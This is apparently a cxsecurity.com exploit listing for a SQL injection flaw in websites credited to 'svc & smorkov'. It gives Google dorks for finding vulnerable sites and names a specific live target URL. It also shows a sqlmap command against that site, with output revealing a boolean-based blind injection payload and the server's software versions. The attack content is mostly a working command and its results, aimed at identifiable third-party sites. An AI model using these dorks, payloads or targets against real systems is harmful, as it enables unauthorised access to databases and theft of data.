Web design & development by svc & smorkov SQLi Vuln

2017.06.06
tr HocaXD (TR) tr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: Web design & development by: svc & smorkov Concept by: Florin Lazarescu

################################################## # Exploit Title: Web design & development by: svc & smorkov SQLİ Vuln. # Google Dork 1: Web design & development by: svc & smorkov Concept by: Florin Lazarescu # Google Dork 2: inurl:s.php?id= intext:writing # Date: 04.06.2017 # Exploit Author: HocaXD # Version: V.1 # Category: Web Apps # Tested on: Parrot Security OS / Google Chrome ################################################## # CVE : sqlmap -u "http://www.romanianwriters.ro/s.php?id=1'" --dbs [+] sqlmap identified the following injection point(s) with a total of 337 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-9479' OR 9765=9765# --- [11:39:29] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL Unknown ##################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top